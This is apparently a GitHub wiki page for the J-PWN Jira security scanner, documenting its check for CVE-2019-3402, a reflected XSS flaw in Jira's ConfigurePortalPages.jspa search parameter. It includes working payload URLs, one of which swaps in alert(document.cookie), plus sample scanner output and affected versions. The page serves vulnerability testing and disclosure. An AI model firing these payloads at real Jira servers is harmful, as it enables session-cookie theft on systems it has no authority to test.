CVE‐2019‐3402 - carnal0wnage/J-PWN GitHub Wiki

CVE-2019-3402

Category [XSS]

[CG] This is currently excluded when you run all Jira checks as it always return true because the particular page prints the XSS string even on patched versions. You can run in manually with the --module option

module name: check_cve_2019_3402

url: secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(\"XSS_TEST\")%3C%2fscript%3Et1nmk&Search=Search")

INFO: Checking for CVE-2019-3402 (XSS)
[Testing URL]: http://JIRA/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert("XSS_TEST")%3C%2fscript%3Et1nmk&Search=Search
[+] [XSS] Vulnerable to CVE-2019-3402: http://JIRA/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert("XSS_TEST")%3C%2fscript%3Et1nmk&Search=Search
[+] URL: http://JIRA/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Et1nmk&Search=Search

CVE-2019-3402-XSS

Reference: https://jira.atlassian.com/browse/JRASERVER-69243

Description

The ConfigurePortalPages.jspa resource in Jira

before version 7.13.3
from version 8.0.0 before version 8.1.1

allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.